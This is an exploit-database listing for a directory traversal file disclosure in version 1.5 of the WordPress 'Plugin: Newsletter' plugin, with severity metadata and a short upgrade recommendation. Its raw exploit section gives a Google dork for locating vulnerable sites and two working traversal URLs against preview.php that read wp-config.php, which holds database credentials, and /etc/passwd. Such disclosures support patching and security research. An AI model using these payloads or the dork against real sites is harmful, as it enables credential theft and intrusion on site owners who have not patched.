header-logo
Suggest Exploit
vendor:
Plugin: Newsletter
by:
Sammy FORGIT
7,5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: Plugin: Newsletter
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:plugin-newsletter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

WordPress Plugins – Plugin: Newsletter Remote File Disclosure Vulnerability

A vulnerability in the Plugin: Newsletter plugin for Wordpress allows remote attackers to read arbitrary files via a ../../../../../../../../etc/passwd directory traversal in the data parameter to preview.php.

Mitigation:

Upgrade to the latest version of the Plugin: Newsletter plugin for Wordpress.
Source

Exploit-DB raw data:

##################################################
# Description : Wordpress Plugins - Plugin: Newsletter Remote File 
Disclosure Vulnerability
# Version : 1.5
# Link : http://wordpress.org/extend/plugins/plugin-newsletter/
# Plugins : http://downloads.wordpress.org/plugin/plugin-newsletter.zip
# Date : 31-05-2012
# Google Dork : inurl:/wp-content/plugins/plugin-newsletter/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php

Read source [CTRL-u]

http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../../../../../etc/passwd

Read source [CTRL-u]